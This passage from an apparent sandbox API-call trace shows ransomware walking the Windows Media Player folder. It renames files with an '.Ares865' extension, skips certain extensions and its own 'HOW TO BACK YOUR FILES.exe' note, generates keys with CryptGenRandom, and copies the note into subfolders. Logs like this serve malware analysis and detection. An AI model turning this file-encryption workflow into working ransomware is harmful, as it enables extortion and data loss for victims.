CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.969] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fdc01da, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x4fdc01da, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7a92dc30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpenc.exe", cAlternateFileName="")) returned 1 [0121.969] lstrcmpiW (lpString1="wmpenc.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.969] lstrcmpiW (lpString1="wmpenc.exe", lpString2="aoldtz.exe") returned 1 [0121.969] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmpenc.exe" | out: lpString1="wmpenc.exe") returned="wmpenc.exe" [0121.969] lstrlenW (lpString="wmpenc.exe") returned 10 [0121.969] lstrlenW (lpString="Ares865") returned 7 [0121.969] lstrcmpiW (lpString1="enc.exe", lpString2="Ares865") returned 1 [0121.969] lstrlenW (lpString=".dll") returned 4 [0121.969] lstrcmpiW (lpString1="wmpenc.exe", lpString2=".dll") returned 1 [0121.969] lstrlenW (lpString=".lnk") returned 4 [0121.969] lstrcmpiW (lpString1="wmpenc.exe", lpString2=".lnk") returned 1 [0121.969] lstrlenW (lpString=".ini") returned 4 [0121.969] lstrcmpiW (lpString1="wmpenc.exe", lpString2=".ini") returned 1 [0121.970] lstrlenW (lpString=".sys") returned 4 [0121.970] lstrcmpiW (lpString1="wmpenc.exe", lpString2=".sys") returned 1 [0121.970] lstrlenW (lpString="wmpenc.exe") returned 10 [0121.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.Ares865") returned 62 [0121.970] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe.ares865"), dwFlags=0x1) returned 1 [0121.973] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.973] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24064) returned 1 [0121.974] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.974] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.974] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.979] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.981] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmplayer.exe", cAlternateFileName="")) returned 1 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2="aoldtz.exe") returned 1 [0121.981] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmplayer.exe" | out: lpString1="wmplayer.exe") returned="wmplayer.exe" [0121.981] lstrlenW (lpString="wmplayer.exe") returned 12 [0121.981] lstrlenW (lpString="Ares865") returned 7 [0121.981] lstrcmpiW (lpString1="yer.exe", lpString2="Ares865") returned 1 [0121.981] lstrlenW (lpString=".dll") returned 4 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2=".dll") returned 1 [0121.981] lstrlenW (lpString=".lnk") returned 4 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2=".lnk") returned 1 [0121.981] lstrlenW (lpString=".ini") returned 4 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2=".ini") returned 1 [0121.981] lstrlenW (lpString=".sys") returned 4 [0121.981] lstrcmpiW (lpString1="wmplayer.exe", lpString2=".sys") returned 1 [0121.981] lstrlenW (lpString="wmplayer.exe") returned 12 [0121.982] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.Ares865") returned 64 [0121.982] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe.ares865"), dwFlags=0x1) returned 1 [0121.984] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.984] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=164864) returned 1 [0121.985] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.985] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.985] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.047] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.048] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.048] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.051] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5749e95b, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x5749e95b, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19ea830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x20a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPMediaSharing.dll", cAlternateFileName="")) returned 1 [0122.051] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.051] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2="aoldtz.exe") returned 1 [0122.051] lstrcpyW (in: lpString1=0x2cce458, lpString2="WMPMediaSharing.dll" | out: lpString1="WMPMediaSharing.dll") returned="WMPMediaSharing.dll" [0122.051] lstrlenW (lpString="WMPMediaSharing.dll") returned 19 [0122.051] lstrlenW (lpString="Ares865") returned 7 [0122.051] lstrcmpiW (lpString1="ing.dll", lpString2="Ares865") returned 1 [0122.051] lstrlenW (lpString=".dll") returned 4 [0122.051] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2=".dll") returned 1 [0122.051] lstrlenW (lpString=".lnk") returned 4 [0122.052] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2=".lnk") returned 1 [0122.052] lstrlenW (lpString=".ini") returned 4 [0122.052] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2=".ini") returned 1 [0122.052] lstrlenW (lpString=".sys") returned 4 [0122.052] lstrcmpiW (lpString1="WMPMediaSharing.dll", lpString2=".sys") returned 1 [0122.052] lstrlenW (lpString="WMPMediaSharing.dll") returned 19 [0122.052] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.Ares865") returned 71 [0122.052] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll.ares865"), dwFlags=0x1) returned 1 [0122.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133632) returned 1 [0122.055] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.086] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.087] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.087] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.089] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c0b4b2, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x59c0b4b2, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19ea830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x73400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpnssci.dll", cAlternateFileName="")) returned 1 [0122.089] lstrcmpiW (lpString1="wmpnssci.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.089] lstrcmpiW (lpString1="wmpnssci.dll", lpString2="aoldtz.exe") returned 1 [0122.089] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmpnssci.dll" | out: lpString1="wmpnssci.dll") returned="wmpnssci.dll" [0122.089] lstrlenW (lpString="wmpnssci.dll") returned 12 [0122.089] lstrlenW (lpString="Ares865") returned 7 [0122.089] lstrcmpiW (lpString1="sci.dll", lpString2="Ares865") returned 1 [0122.090] lstrlenW (lpString=".dll") returned 4 [0122.090] lstrcmpiW (lpString1="wmpnssci.dll", lpString2=".dll") returned 1 [0122.090] lstrlenW (lpString=".lnk") returned 4 [0122.090] lstrcmpiW (lpString1="wmpnssci.dll", lpString2=".lnk") returned 1 [0122.090] lstrlenW (lpString=".ini") returned 4 [0122.090] lstrcmpiW (lpString1="wmpnssci.dll", lpString2=".ini") returned 1 [0122.090] lstrlenW (lpString=".sys") returned 4 [0122.090] lstrcmpiW (lpString1="wmpnssci.dll", lpString2=".sys") returned 1 [0122.090] lstrlenW (lpString="wmpnssci.dll") returned 12 [0122.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.Ares865") returned 64 [0122.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll.ares865"), dwFlags=0x1) returned 1 [0122.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.094] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=472064) returned 1 [0122.094] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.095] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.199] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.199] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.206] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4041c528, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x4041c528, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb1a36320, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPNSSUI.dll", cAlternateFileName="")) returned 1 [0122.206] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.206] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2="aoldtz.exe") returned 1 [0122.206] lstrcpyW (in: lpString1=0x2cce458, lpString2="WMPNSSUI.dll" | out: lpString1="WMPNSSUI.dll") returned="WMPNSSUI.dll" [0122.207] lstrlenW (lpString="WMPNSSUI.dll") returned 12 [0122.207] lstrlenW (lpString="Ares865") returned 7 [0122.207] lstrcmpiW (lpString1="SUI.dll", lpString2="Ares865") returned 1 [0122.207] lstrlenW (lpString=".dll") returned 4 [0122.207] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2=".dll") returned 1 [0122.207] lstrlenW (lpString=".lnk") returned 4 [0122.207] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2=".lnk") returned 1 [0122.207] lstrlenW (lpString=".ini") returned 4 [0122.207] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2=".ini") returned 1 [0122.207] lstrlenW (lpString=".sys") returned 4 [0122.207] lstrcmpiW (lpString1="WMPNSSUI.dll", lpString2=".sys") returned 1 [0122.207] lstrlenW (lpString="WMPNSSUI.dll") returned 12 [0122.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.Ares865") returned 64 [0122.207] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll.ares865"), dwFlags=0x1) returned 1 [0122.210] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.210] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31744) returned 1 [0122.210] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.211] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.223] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.225] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53bc9d99, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x53bc9d99, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7ad31980, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmprph.exe", cAlternateFileName="")) returned 1 [0122.225] lstrcmpiW (lpString1="wmprph.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.225] lstrcmpiW (lpString1="wmprph.exe", lpString2="aoldtz.exe") returned 1 [0122.225] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmprph.exe" | out: lpString1="wmprph.exe") returned="wmprph.exe" [0122.225] lstrlenW (lpString="wmprph.exe") returned 10 [0122.225] lstrlenW (lpString="Ares865") returned 7 [0122.225] lstrcmpiW (lpString1="rph.exe", lpString2="Ares865") returned 1 [0122.225] lstrlenW (lpString=".dll") returned 4 [0122.225] lstrcmpiW (lpString1="wmprph.exe", lpString2=".dll") returned 1 [0122.225] lstrlenW (lpString=".lnk") returned 4 [0122.225] lstrcmpiW (lpString1="wmprph.exe", lpString2=".lnk") returned 1 [0122.225] lstrlenW (lpString=".ini") returned 4 [0122.225] lstrcmpiW (lpString1="wmprph.exe", lpString2=".ini") returned 1 [0122.225] lstrlenW (lpString=".sys") returned 4 [0122.226] lstrcmpiW (lpString1="wmprph.exe", lpString2=".sys") returned 1 [0122.226] lstrlenW (lpString="wmprph.exe") returned 10 [0122.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.Ares865") returned 62 [0122.226] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe.ares865"), dwFlags=0x1) returned 1 [0122.228] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62976) returned 1 [0122.228] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.229] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.229] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.254] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.255] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.255] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.256] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpshare.exe", cAlternateFileName="")) returned 1 [0122.256] lstrcmpiW (lpString1="wmpshare.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.256] lstrcmpiW (lpString1="wmpshare.exe", lpString2="aoldtz.exe") returned 1 [0122.256] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmpshare.exe" | out: lpString1="wmpshare.exe") returned="wmpshare.exe" [0122.256] lstrlenW (lpString="wmpshare.exe") returned 12 [0122.256] lstrlenW (lpString="Ares865") returned 7 [0122.257] lstrcmpiW (lpString1="are.exe", lpString2="Ares865") returned -1 [0122.257] lstrlenW (lpString=".dll") returned 4 [0122.257] lstrcmpiW (lpString1="wmpshare.exe", lpString2=".dll") returned 1 [0122.257] lstrlenW (lpString=".lnk") returned 4 [0122.257] lstrcmpiW (lpString1="wmpshare.exe", lpString2=".lnk") returned 1 [0122.257] lstrlenW (lpString=".ini") returned 4 [0122.257] lstrcmpiW (lpString1="wmpshare.exe", lpString2=".ini") returned 1 [0122.257] lstrlenW (lpString=".sys") returned 4 [0122.257] lstrcmpiW (lpString1="wmpshare.exe", lpString2=".sys") returned 1 [0122.257] lstrlenW (lpString="wmpshare.exe") returned 12 [0122.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.Ares865") returned 64 [0122.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe.ares865"), dwFlags=0x1) returned 1 [0122.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102400) returned 1 [0122.260] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.261] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.261] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.298] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.298] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.300] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpshare.exe", cAlternateFileName="")) returned 0 [0122.301] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.301] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0122.301] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\Visualizations", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Visualizations") returned="C:\\Program Files (x86)\\Windows Media Player\\Visualizations" [0122.301] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\Visualizations" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Visualizations") returned="C:\\Program Files (x86)\\Windows Media Player\\Visualizations" [0122.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.302] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\visualizations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.303] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.304] GetLastError () returned 0x0 [0122.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.304] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.305] CloseHandle (hObject=0x120) returned 1 [0122.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.305] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.305] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, 